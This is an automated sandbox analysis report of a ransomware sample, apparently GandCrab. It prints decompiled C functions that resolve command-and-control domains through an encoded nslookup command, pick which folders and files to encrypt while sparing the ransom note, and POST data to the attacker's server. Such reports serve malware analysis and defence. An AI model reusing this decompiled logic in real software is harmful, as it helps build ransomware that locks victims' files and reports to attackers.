                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$ContextCrypt$Alloc$AcquireFree$AttributesErrorFileLastRelease$AddressCriticalEnterHandleLibraryLoadMessageModuleProcSectionlstrcatlstrcpy
                                    • String ID: $.$B$Fatal error$Fatal error: rsaenh.dll is not initialized as well$R
                                    • API String ID: 1177701972-4284454829
                                    • Opcode ID: d2239df4d315249baa282ffdd590b046ef2cdee9d3873c7aba93cddc4ef94197
                                    • Instruction ID: 63fb65d804fdccc66e8479edd4c4325c16705e29d2ccbd0540d3ae74a9049b57
                                    • Opcode Fuzzy Hash: d2239df4d315249baa282ffdd590b046ef2cdee9d3873c7aba93cddc4ef94197
                                    • Instruction Fuzzy Hash: 09C17D71E80309ABEB118F94DC45FEEBBB8BF88B11F204115F640BA181DBB479548F64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0F145060(CHAR* __ecx, void* __edx, WCHAR* _a4) {
                                    				struct _SECURITY_ATTRIBUTES _v16;
                                    				short _v20;
                                    				intOrPtr _v24;
                                    				intOrPtr _v28;
                                    				intOrPtr _v32;
                                    				intOrPtr _v36;
                                    				intOrPtr _v40;
                                    				intOrPtr _v44;
                                    				intOrPtr _v48;
                                    				intOrPtr _v52;
                                    				intOrPtr _v56;
                                    				intOrPtr _v60;
                                    				intOrPtr _v64;
                                    				intOrPtr _v68;
                                    				char _v72;
                                    				short _v76;
                                    				intOrPtr _v80;
                                    				intOrPtr _v84;
                                    				intOrPtr _v88;
                                    				intOrPtr _v92;
                                    				intOrPtr _v96;
                                    				intOrPtr _v100;
                                    				intOrPtr _v104;
                                    				intOrPtr _v108;
                                    				intOrPtr _v112;
                                    				intOrPtr _v116;
                                    				intOrPtr _v120;
                                    				intOrPtr _v124;
                                    				char _v128;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t43;
                                    				void* _t55;
                                    				CHAR* _t62;
                                    				void* _t64;
                                    
                                    				_v72 = 0x73006e;
                                    				_t55 = __edx;
                                    				_v20 = 0;
                                    				_t62 = __ecx;
                                    				_v76 = 0;
                                    				_v68 = 0x6f006c;
                                    				_t41 =  !=  ?  &_v128 :  &_v72;
                                    				_v64 = 0x6b006f;
                                    				_a4 =  !=  ?  &_v128 :  &_v72;
                                    				_v60 = 0x700075;
                                    				_v56 = 0x250020;
                                    				_v52 = 0x200053;
                                    				_v48 = 0x73006e;
                                    				_v44 = 0x2e0031;
                                    				_v40 = 0x690076;
                                    				_v36 = 0x6d0072;
                                    				_v32 = 0x630061;
                                    				_v28 = 0x2e0068;
                                    				_v24 = 0x750072;
                                    				_v128 = 0x73006e;
                                    				_v124 = 0x6f006c;
                                    				_v120 = 0x6b006f;
                                    				_v116 = 0x700075;
                                    				_v112 = 0x250020;
                                    				_v108 = 0x200053;
                                    				_v104 = 0x73006e;
                                    				_v100 = 0x2e0032;
                                    				_v96 = 0x690076;
                                    				_v92 = 0x6d0072;
                                    				_v88 = 0x630061;
                                    				_v84 = 0x2e0068;
                                    				_v80 = 0x750072;
                                    				_v16.nLength = 0xc;
                                    				_v16.bInheritHandle = 1;
                                    				_v16.lpSecurityDescriptor = 0;
                                    				_t43 = CreatePipe(0xf152a70, 0xf152a6c,  &_v16, 0);
                                    				if(_t43 != 0) {
                                    					_t43 = SetHandleInformation( *0xf152a70, 1, 0);
                                    					if(_t43 == 0) {
                                    						goto L1;
                                    					} else {
                                    						CreatePipe(0xf152a68, 0xf152a74,  &_v16, 0);
                                    						_t43 = SetHandleInformation( *0xf152a74, 1, 0);
                                    						if(_t43 == 0) {
                                    							goto L1;
                                    						} else {
                                    							_t64 = VirtualAlloc(0, 0x2800, 0x3000, 4);
                                    							if(_t64 == 0) {
                                    								lstrcpyA(_t62, "fabian wosar <3");
                                    								return 0;
                                    							} else {
                                    								wsprintfW(_t64, _a4, _t55);
                                    								E0F144E10(_t64);
                                    								E0F144FB0(_t55, _t62, _t55, _t62, _t64);
                                    								VirtualFree(_t64, 0, 0x8000);
                                    								return 0;
                                    							}
                                    						}
                                    					}
                                    				} else {
                                    					L1:
                                    					return _t43 | 0xffffffff;
                                    				}
                                    			}







































                                    0x0f14506d
                                    0x0f145078
                                    0x0f14507b
                                    0x0f14507f
                                    0x0f145081
                                    0x0f14508b
                                    0x0f145092
                                    0x0f145095
                                    0x0f14509e
                                    0x0f1450af
                                    0x0f1450b6
                                    0x0f1450bd
                                    0x0f1450c4
                                    0x0f1450cb
                                    0x0f1450d2
                                    0x0f1450d9
                                    0x0f1450e0
                                    0x0f1450e7
                                    0x0f1450ee
                                    0x0f1450f5
                                    0x0f1450fc
                                    0x0f145103
                                    0x0f14510a
                                    0x0f145111
                                    0x0f145118
                                    0x0f14511f
                                    0x0f145126
                                    0x0f14512d
                                    0x0f145134
                                    0x0f14513b
                                    0x0f145142
                                    0x0f145149
                                    0x0f145150
                                    0x0f145157
                                    0x0f14515e
                                    0x0f145165
                                    0x0f14516d
                                    0x0f145189
                                    0x0f14518d
                                    0x00000000
                                    0x0f14518f
                                    0x0f14519f
                                    0x0f1451af
                                    0x0f1451b3
                                    0x00000000
                                    0x0f1451b5
                                    0x0f1451c9
                                    0x0f1451cd
                                    0x0f14520a
                                    0x0f145218
                                    0x0f1451cf
                                    0x0f1451d4
                                    0x0f1451df
                                    0x0f1451e8
                                    0x0f1451f5
                                    0x0f145203
                                    0x0f145203
                                    0x0f1451cd
                                    0x0f1451b3
                                    0x0f14516f
                                    0x0f14516f
                                    0x0f145178
                                    0x0f145178

                                    APIs
                                    • CreatePipe.KERNEL32(0F152A70,0F152A6C,?,00000000,00000001,00000001,00000000), ref: 0F145165
                                    • SetHandleInformation.KERNEL32(00000001,00000000), ref: 0F145189
                                    • CreatePipe.KERNEL32(0F152A68,0F152A74,0000000C,00000000), ref: 0F14519F
                                    • SetHandleInformation.KERNEL32(00000001,00000000), ref: 0F1451AF
                                    • VirtualAlloc.KERNEL32(00000000,00002800,00003000,00000004), ref: 0F1451C3
                                    • wsprintfW.USER32 ref: 0F1451D4
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F1451F5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateHandleInformationPipeVirtual$AllocFreewsprintf
                                    • String ID: $ $1$2$S$S$a$a$fabian wosar <3$h$h$l$l$n$n$n$n$o$o$r$r$r$r$u$u$v$v
                                    • API String ID: 1490407255-3072057902
                                    • Opcode ID: 1fa3cd6cb856cad28e37d885613d672d40c60af188271a8dc10bc390da60f05e
                                    • Instruction ID: d722508445dc225340cf302e61df0a557076f2a661f2e4eea31f0abeb45f3872
                                    • Opcode Fuzzy Hash: 1fa3cd6cb856cad28e37d885613d672d40c60af188271a8dc10bc390da60f05e
                                    • Instruction Fuzzy Hash: D9413D71E40308ABEB108F94D8487EDBFB6FF44B59F104119E914AB282C7FA55A98F94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 93%
                                    			E0F1468F0(WCHAR* __ecx) {
                                    				int _t4;
                                    				signed int _t5;
                                    				signed int _t15;
                                    				void* _t19;
                                    				WCHAR* _t21;
                                    				short* _t25;
                                    				WCHAR* _t26;
                                    
                                    				_t21 = __ecx;
                                    				_t4 = lstrlenW(__ecx);
                                    				_t5 = lstrlenW(_t21);
                                    				_t1 = _t21 - 2; // -2
                                    				_t25 = _t1 + _t5 * 2;
                                    				_t19 = _t4 - 1;
                                    				if(_t19 != 0) {
                                    					do {
                                    						_t25 = _t25 - 2;
                                    						_t19 = _t19 - 1;
                                    					} while ( *_t25 != 0x5c && _t19 != 0);
                                    				}
                                    				_t26 = _t25 + 2;
                                    				if(lstrcmpiW(_t26, L"desktop.ini") != 0) {
                                    					if(lstrcmpiW(_t26, L"autorun.inf") == 0 || lstrcmpiW(_t26, L"ntuser.dat") == 0 || lstrcmpiW(_t26, L"iconcache.db") == 0 || lstrcmpiW(_t26, L"bootsect.bak") == 0 || lstrcmpiW(_t26, L"boot.ini") == 0 || lstrcmpiW(_t26, L"ntuser.dat.log") == 0 || lstrcmpiW(_t26, L"thumbs.db") == 0) {
                                    						goto L5;
                                    					} else {
                                    						_t15 = lstrcmpiW(_t26, L"CRAB-DECRYPT.txt");
                                    						asm("sbb eax, eax");
                                    						return  ~_t15 + 1;
                                    					}
                                    				} else {
                                    					L5:
                                    					return 1;
                                    				}
                                    			}










                                    0x0f1468f9
                                    0x0f1468fc
                                    0x0f146901
                                    0x0f146903
                                    0x0f146906
                                    0x0f146909
                                    0x0f14690a
                                    0x0f146910
                                    0x0f146910
                                    0x0f146913
                                    0x0f146914
                                    0x0f146910
                                    0x0f146924
                                    0x0f146931
                                    0x0f146946
                                    0x00000000
                                    0x0f146990
                                    0x0f146996
                                    0x0f14699b
                                    0x0f1469a0
                                    0x0f1469a0
                                    0x0f146935
                                    0x0f146935
                                    0x0f14693b
                                    0x0f14693b

                                    APIs
                                    • lstrlenW.KERNEL32(00000000,00000010,00000000,00000000,0F146B03), ref: 0F1468FC
                                    • lstrlenW.KERNEL32(00000000), ref: 0F146901
                                    • lstrcmpiW.KERNEL32(-00000004,desktop.ini), ref: 0F14692D
                                    • lstrcmpiW.KERNEL32(-00000004,autorun.inf), ref: 0F146942
                                    • lstrcmpiW.KERNEL32(-00000004,ntuser.dat), ref: 0F14694E
                                    • lstrcmpiW.KERNEL32(-00000004,iconcache.db), ref: 0F14695A
                                    • lstrcmpiW.KERNEL32(-00000004,bootsect.bak), ref: 0F146966
                                    • lstrcmpiW.KERNEL32(-00000004,boot.ini), ref: 0F146972
                                    • lstrcmpiW.KERNEL32(-00000004,ntuser.dat.log), ref: 0F14697E
                                    • lstrcmpiW.KERNEL32(-00000004,thumbs.db), ref: 0F14698A
                                    • lstrcmpiW.KERNEL32(-00000004,CRAB-DECRYPT.txt), ref: 0F146996
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcmpi$lstrlen
                                    • String ID: i)w$CRAB-DECRYPT.txt$autorun.inf$boot.ini$bootsect.bak$desktop.ini$iconcache.db$ntuser.dat$ntuser.dat.log$thumbs.db
                                    • API String ID: 203586893-739155506
                                    • Opcode ID: c54e53eda536cd3f5f7bbce1ef31b519128ad282826b22c4f4168045bc070aee
                                    • Instruction ID: d274dbd2a2f5660cc9c54eb7d67d23f865e5de7e5bbb30c5988e9bfe40ec89b2
                                    • Opcode Fuzzy Hash: c54e53eda536cd3f5f7bbce1ef31b519128ad282826b22c4f4168045bc070aee
                                    • Instruction Fuzzy Hash: 4411C27268062679AA20767DDC11EEF928CAFD6A993870125F900F3103EFC5F67354B5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 19%
                                    			E0F146780(void* __ecx) {
                                    				void* _t12;
                                    				intOrPtr* _t23;
                                    				void* _t51;
                                    				void* _t52;
                                    
                                    				_t52 = __ecx;
                                    				_t51 = VirtualAlloc(0, 0x201, 0x3000, 0x40);
                                    				if(E0F1481F0(_t52, L"\\ProgramData\\") != 0 || E0F1481F0(_t52, L"\\IETldCache\\") != 0 || E0F1481F0(_t52, L"\\Boot\\") != 0 || E0F1481F0(_t52, L"\\Program Files\\") != 0 || E0F1481F0(_t52, L"\\Tor Browser\\") != 0 || E0F1481F0(_t52, L"Ransomware") != 0 || E0F1481F0(_t52, L"\\All Users\\") != 0 || E0F1481F0(_t52, L"\\Local Settings\\") != 0) {
                                    					L18:
                                    					VirtualFree(_t51, 0, 0x8000);
                                    					return 0;
                                    				} else {
                                    					_t12 = E0F1481F0(_t52, L"\\Windows\\");
                                    					if(_t12 != 0) {
                                    						goto L18;
                                    					} else {
                                    						_t23 = __imp__SHGetSpecialFolderPathW;
                                    						_push(_t12);
                                    						_push(0x2a);
                                    						_push(_t51);
                                    						_push(_t12);
                                    						if( *_t23() == 0 || E0F1481F0(_t52, _t51) == 0) {
                                    							_push(0);
                                    							_push(0x2b);
                                    							_push(_t51);
                                    							_push(0);
                                    							if( *_t23() == 0 || E0F1481F0(_t52, _t51) == 0) {
                                    								_push(0);
                                    								_push(0x24);
                                    								_push(_t51);
                                    								_push(0);
                                    								if( *_t23() == 0 || E0F1481F0(_t52, _t51) == 0) {
                                    									_push(0);
                                    									_push(0x1c);
                                    									_push(_t51);
                                    									_push(0);
                                    									if( *_t23() == 0 || E0F1481F0(_t52, _t51) == 0) {
                                    										VirtualFree(_t51, 0, 0x8000);
                                    										return 1;
                                    									} else {
                                    										goto L18;
                                    									}
                                    								} else {
                                    									goto L18;
                                    								}
                                    							} else {
                                    								goto L18;
                                    							}
                                    						} else {
                                    							goto L18;
                                    						}
                                    					}
                                    				}
                                    			}







                                    0x0f146791
                                    0x0f1467a0
                                    0x0f1467a9
                                    0x0f1468d4
                                    0x0f1468dd
                                    0x0f1468e8
                                    0x0f14683b
                                    0x0f146842
                                    0x0f146849
                                    0x00000000
                                    0x0f14684f
                                    0x0f14684f
                                    0x0f146855
                                    0x0f146856
                                    0x0f146858
                                    0x0f146859
                                    0x0f14685e
                                    0x0f14686d
                                    0x0f14686f
                                    0x0f146871
                                    0x0f146872
                                    0x0f146878
                                    0x0f146887
                                    0x0f146889
                                    0x0f14688b
                                    0x0f14688c
                                    0x0f146892
                                    0x0f1468a1
                                    0x0f1468a3
                                    0x0f1468a5
                                    0x0f1468a6
                                    0x0f1468ac
                                    0x0f1468c8
                                    0x0f1468d3
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f14685e
                                    0x0f146849

                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,0F146E06,00000000,?,?), ref: 0F146793
                                    • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,0F146E06,00000000,?,?), ref: 0F14685A
                                    • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,0F146E06,00000000,?,?), ref: 0F146874
                                    • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,0F146E06,00000000,?,?), ref: 0F14688E
                                    • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,0F146E06,00000000,?,?), ref: 0F1468A8
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0F146E06,00000000,?,?), ref: 0F1468C8
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0F146E06,00000000,?,?), ref: 0F1468DD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FolderPathSpecial$Virtual$Free$Alloc
                                    • String ID: Ransomware$\All Users\$\Boot\$\IETldCache\$\Local Settings\$\Program Files\$\ProgramData\$\Tor Browser\$\Windows\
                                    • API String ID: 1363212851-3735464813
                                    • Opcode ID: 120e8aed4a7f5a0d87411793372668ee878a13f1cd89df64d180b94e2745df50
                                    • Instruction ID: a19bb2b7cdc2d2800e985c6a72e00cfcbb3476497575e4060e94128b0ac170ce
                                    • Opcode Fuzzy Hash: 120e8aed4a7f5a0d87411793372668ee878a13f1cd89df64d180b94e2745df50
                                    • Instruction Fuzzy Hash: 4531012074076227ED2432670D25B6F855A8FE6E59F504025AB01EF6C3FF58F93387AA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 86%
                                    			E0F145220() {
                                    				WCHAR* _v8;
                                    				intOrPtr _v12;
                                    				char _v16;
                                    				intOrPtr _v20;
                                    				char _v24;
                                    				char* _v28;
                                    				char* _v32;
                                    				char* _v36;
                                    				short _v40;
                                    				char _v56;
                                    				short _v60;
                                    				intOrPtr _v64;
                                    				char _v80;
                                    				WCHAR* _t26;
                                    				intOrPtr _t27;
                                    				long _t32;
                                    				WCHAR* _t37;
                                    				void* _t39;
                                    				signed int _t40;
                                    				signed int _t41;
                                    				signed int _t45;
                                    				void* _t48;
                                    				WCHAR* _t49;
                                    				void* _t52;
                                    				void* _t53;
                                    
                                    				asm("movdqa xmm0, [0xf150540]");
                                    				_v36 =  &_v56;
                                    				asm("movdqu [ebp-0x34], xmm0");
                                    				_v32 =  &_v80;
                                    				asm("movdqa xmm0, [0xf150520]");
                                    				_v40 = 0x74;
                                    				asm("movdqu [ebp-0x4c], xmm0");
                                    				_v64 = 0x69622e6d;
                                    				_v60 = 0x74;
                                    				_v24 = 0x62636467;
                                    				_v20 = 0x7469622e;
                                    				_v16 = 0;
                                    				_v28 =  &_v24;
                                    				_t26 = VirtualAlloc(0, 0x100, 0x3000, 4);
                                    				_t37 = _t26;
                                    				_v8 = _t37;
                                    				if(_t37 != 0) {
                                    					_t40 = 0;
                                    					_t48 = 1;
                                    					_t45 = 0;
                                    					while(1) {
                                    						_t27 =  *((intOrPtr*)(_t52 + _t45 * 4 - 0x20));
                                    						_t45 = _t45 + 1;
                                    						_v12 = _t27;
                                    						if(_t45 == 3) {
                                    							asm("sbb esi, esi");
                                    							_t48 =  ~(_t48 - 1) + 2;
                                    							_t45 = 0;
                                    						}
                                    						if(_t40 == 0xffffffff) {
                                    							Sleep(0x3e8);
                                    						}
                                    						_t39 = VirtualAlloc(0, 2 + lstrlenW(_t37) * 2, 0x3000, 4);
                                    						_t41 = _t39;
                                    						E0F145060(_t41, _v12, _t48);
                                    						_t53 = _t53 + 4;
                                    						_t32 = lstrcmpiA(_t39, "fabian wosar <3");
                                    						if(_t32 != 0) {
                                    							break;
                                    						}
                                    						VirtualFree(_t39, _t32, 0x8000);
                                    						_t37 = _v8;
                                    						_t40 = _t41 | 0xffffffff;
                                    					}
                                    					_t49 = _v8;
                                    					wsprintfW(_t49, L"%S", _t39);
                                    					VirtualFree(_t39, 0, 0x8000);
                                    					_t26 = _t49;
                                    				}
                                    				return _t26;
                                    			}




























                                    0x0f145226
                                    0x0f145236
                                    0x0f145241
                                    0x0f145246
                                    0x0f14524c
                                    0x0f14525b
                                    0x0f145261
                                    0x0f145266
                                    0x0f14526d
                                    0x0f145273
                                    0x0f14527a
                                    0x0f145281
                                    0x0f145285
                                    0x0f145288
                                    0x0f14528e
                                    0x0f145290
                                    0x0f145295
                                    0x0f14529b
                                    0x0f14529d
                                    0x0f1452a2
                                    0x0f1452a4
                                    0x0f1452a4
                                    0x0f1452a8
                                    0x0f1452a9
                                    0x0f1452af
                                    0x0f1452b4
                                    0x0f1452b6
                                    0x0f1452b9
                                    0x0f1452b9
                                    0x0f1452be
                                    0x0f1452c5
                                    0x0f1452c5
                                    0x0f1452ec
                                    0x0f1452ef
                                    0x0f1452f1
                                    0x0f1452f6
                                    0x0f1452ff
                                    0x0f145307
                                    0x00000000
                                    0x00000000
                                    0x0f145310
                                    0x0f145316
                                    0x0f145319
                                    0x0f145319
                                    0x0f14531e
                                    0x0f145328
                                    0x0f145339
                                    0x0f14533f
                                    0x0f14533f
                                    0x0f145347

                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,00000000,00000000,00000000), ref: 0F145288
                                    • Sleep.KERNEL32(000003E8), ref: 0F1452C5
                                    • lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 0F1452D3
                                    • VirtualAlloc.KERNEL32(00000000,00000000), ref: 0F1452E3
                                    • lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 0F1452FF
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F145310
                                    • wsprintfW.USER32 ref: 0F145328
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F145339
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$AllocFree$Sleeplstrcmpilstrlenwsprintf
                                    • String ID: .bit$fabian wosar <3$gdcb$m.bi$t$t
                                    • API String ID: 2709691373-2847225850
                                    • Opcode ID: 624d29e3e39ef5e97a9f7c68cd2ce0f191fdca38bf41d7915906690c15a2df3b
                                    • Instruction ID: 8d91742fd5fb4a6cb00237ff480b8e30281df212c34898dc9b085820fa03c38f
                                    • Opcode Fuzzy Hash: 624d29e3e39ef5e97a9f7c68cd2ce0f191fdca38bf41d7915906690c15a2df3b
                                    • Instruction Fuzzy Hash: 3C31D575E40309EBDB00CFA4ED85BAEBB78EF88721F100125F605A7281D7786A548B94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 22%
                                    			E0F1454F0(CHAR* __ecx, CHAR** __edx, intOrPtr _a8) {
                                    				void* _v8;
                                    				CHAR* _v12;
                                    				void* _v16;
                                    				CHAR** _v20;
                                    				void* _v24;
                                    				char _v28;
                                    				short _v124;
                                    				void* _t40;
                                    				CHAR* _t44;
                                    				CHAR* _t46;
                                    				void* _t47;
                                    				void* _t55;
                                    				void* _t56;
                                    				CHAR* _t58;
                                    				void* _t59;
                                    
                                    				_t46 = __ecx;
                                    				_v20 = __edx;
                                    				_v12 = __ecx;
                                    				E0F147E40( &_v28);
                                    				_v16 = E0F145220();
                                    				_t55 = 0x400 + lstrlenA(_t46) * 2;
                                    				_t7 = _t55 + 1; // 0x1
                                    				_t47 = VirtualAlloc(0, _t7, 0x3000, 0x40);
                                    				_v8 = VirtualAlloc(0, 0x32001, 0x3000, 0x40);
                                    				if(_t47 == 0) {
                                    					L3:
                                    					_t58 = 0;
                                    					L4:
                                    					lstrcatA(_t58, _v12);
                                    					asm("movdqu xmm0, [0xf14fb40]");
                                    					asm("movdqu [ebp-0x78], xmm0");
                                    					asm("movdqu xmm0, [0xf14fb50]");
                                    					asm("movdqu [ebp-0x68], xmm0");
                                    					asm("movdqu xmm0, [0xf14fb60]");
                                    					asm("movdqu [ebp-0x58], xmm0");
                                    					asm("movdqu xmm0, [0xf14fb70]");
                                    					asm("movdqu [ebp-0x48], xmm0");
                                    					asm("movdqu xmm0, [0xf14fb80]");
                                    					asm("movdqu [ebp-0x38], xmm0");
                                    					asm("movdqu xmm0, [0xf14fb90]");
                                    					asm("movdqu [ebp-0x28], xmm0");
                                    					lstrlenA(_t58);
                                    					_t56 = 0;
                                    					_push(lstrlenW( &_v124));
                                    					_push( &_v124);
                                    					_push(L"POST");
                                    					_push(0x31fff);
                                    					_push(_v8);
                                    					_push(lstrlenA(_t58));
                                    					_push(_t58);
                                    					_t59 = _v16;
                                    					_push(L"popkadurak");
                                    					_push(_t59);
                                    					if(E0F148050( &_v28) != 0) {
                                    						_t56 = 1;
                                    						if(_a8 != 0) {
                                    							_v12 = 0;
                                    							if(E0F1453D0(_v8,  &_v12) == 0) {
                                    								_t56 = 0;
                                    							} else {
                                    								_t44 = _v12;
                                    								if(_t44 != 0) {
                                    									 *_v20 = _t44;
                                    								}
                                    							}
                                    						}
                                    					}
                                    					VirtualFree(_t59, 0, 0x8000);
                                    					VirtualFree(_v8, 0, 0x8000);
                                    					VirtualFree(_t47, 0, 0x8000);
                                    					_t40 = _v24;
                                    					if(_t40 != 0) {
                                    						InternetCloseHandle(_t40);
                                    					}
                                    					return _t56;
                                    				}
                                    				_t9 = _t55 + 1; // 0x1
                                    				if(_t55 >= _t9) {
                                    					goto L3;
                                    				} else {
                                    					_t58 = _t47;
                                    					goto L4;
                                    				}
                                    			}


















                                    0x0f1454f8
                                    0x0f1454fa
                                    0x0f145501
                                    0x0f145504
                                    0x0f14550f
                                    0x0f145525
                                    0x0f14552c
                                    0x0f145542
                                    0x0f145546
                                    0x0f14554b
                                    0x0f145558
                                    0x0f145558
                                    0x0f14555a
                                    0x0f14555e
                                    0x0f145564
                                    0x0f14556d
                                    0x0f145572
                                    0x0f14557a
                                    0x0f14557f
                                    0x0f145587
                                    0x0f14558c
                                    0x0f145594
                                    0x0f145599
                                    0x0f1455a1
                                    0x0f1455a6
                                    0x0f1455ae
                                    0x0f1455b3
                                    0x0f1455bc
                                    0x0f1455c5
                                    0x0f1455c9
                                    0x0f1455ca
                                    0x0f1455d2
                                    0x0f1455d7
                                    0x0f1455e1
                                    0x0f1455e2
                                    0x0f1455e3
                                    0x0f1455e9
                                    0x0f1455ee
                                    0x0f1455f6
                                    0x0f1455fc
                                    0x0f145601
                                    0x0f145609
                                    0x0f145617
                                    0x0f145627
                                    0x0f145619
                                    0x0f145619
                                    0x0f14561e
                                    0x0f145623
                                    0x0f145623
                                    0x0f14561e
                                    0x0f145617
                                    0x0f145601
                                    0x0f145637
                                    0x0f145643
                                    0x0f14564d
                                    0x0f14564f
                                    0x0f145654
                                    0x0f145657
                                    0x0f145657
                                    0x0f145665
                                    0x0f145665
                                    0x0f14554d
                                    0x0f145552
                                    0x00000000
                                    0x0f145554
                                    0x0f145554
                                    0x00000000
                                    0x0f145554

                                    APIs
                                      • Part of subcall function 0F147E40: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0F148024
                                      • Part of subcall function 0F147E40: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0F14803D
                                      • Part of subcall function 0F145220: VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,00000000,00000000,00000000), ref: 0F145288
                                      • Part of subcall function 0F145220: Sleep.KERNEL32(000003E8), ref: 0F1452C5
                                      • Part of subcall function 0F145220: lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 0F1452D3
                                      • Part of subcall function 0F145220: VirtualAlloc.KERNEL32(00000000,00000000), ref: 0F1452E3
                                      • Part of subcall function 0F145220: lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 0F1452FF
                                      • Part of subcall function 0F145220: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F145310
                                      • Part of subcall function 0F145220: wsprintfW.USER32 ref: 0F145328
                                      • Part of subcall function 0F145220: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F145339
                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,77296980), ref: 0F145512
                                    • VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0F145532
                                    • VirtualAlloc.KERNEL32(00000000,00032001,00003000,00000040), ref: 0F145544
                                    • lstrcatA.KERNEL32(00000000,?), ref: 0F14555E
                                    • lstrlenA.KERNEL32(00000000), ref: 0F1455B3
                                    • lstrlenW.KERNEL32(?), ref: 0F1455BF
                                    • lstrlenA.KERNEL32(00000000,00000000,00031FFF,?,00000000), ref: 0F1455DB
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F145637
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000), ref: 0F145643
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000), ref: 0F14564D
                                    • InternetCloseHandle.WININET(0F14581B), ref: 0F145657
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
